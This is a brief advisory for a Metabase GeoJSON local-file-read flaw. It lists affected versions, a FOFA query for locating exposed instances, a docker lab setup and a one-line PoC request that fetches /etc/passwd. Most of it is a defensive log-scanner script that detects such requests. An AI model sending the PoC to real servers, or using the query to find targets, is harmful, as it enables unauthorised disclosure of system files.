Vulnerability CVSS score: 9.9, damage level: severe
FOFA:
app="metabase"
Affected versions:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
Vulnerability demonstration:
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1
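Detection, as an added example that is not part of the original page: a log scanner that flags /api/geojson requests whose url parameter is not an http(s) address, including percent-encoded and mixed-case forms of the request shown in the PoC. It assumes access logs in common/combined format (for instance from a reverse proxy in front of Metabase); the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common/combined access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ALLOWED_SCHEMES = {"http", "https"}


def suspicious_geojson_url(target):
    """Return the decoded `url` value if a /api/geojson request asks for a
    non-http(s) resource, else None. (Hypothetical helper, not Metabase code.)"""
    parts = urlsplit(target)
    if parts.path.rstrip("/").lower() != "/api/geojson":
        return None
    for value in parse_qs(parts.query).get("url", []):
        # parse_qs already decodes once; decode again to catch double encoding.
        decoded = unquote(value).strip()
        # A value with no scheme at all is also not an http(s) address.
        scheme = decoded.split(":", 1)[0].lower() if ":" in decoded else ""
        if scheme not in ALLOWED_SCHEMES:
            return decoded
    return None


def scan(lines):
    """Yield (line_number, decoded_url) for every flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hit = suspicious_geojson_url(match.group("target"))
            if hit is not None:
                yield number, hit


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:00 +0000] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 200 1874',
    '203.0.113.7 - - [01/Jan/2022:10:00:05 +0000] "GET /api/geojson?url=FILE%3A%2Fetc%2Fhosts HTTP/1.1" 200 220',
    '198.51.100.4 - - [01/Jan/2022:10:01:00 +0000] "GET /api/geojson?url=https://example.com/map.json HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2022:10:02:00 +0000] "GET /api/session/properties HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, url in scan(SAMPLE_LOG):
        print(f"line {number}: /api/geojson requested non-http(s) resource {url!r}")
```

A hit with a 200 status on an instance in the affected version range is worth treating as a possible file disclosure and reviewing alongside the response size.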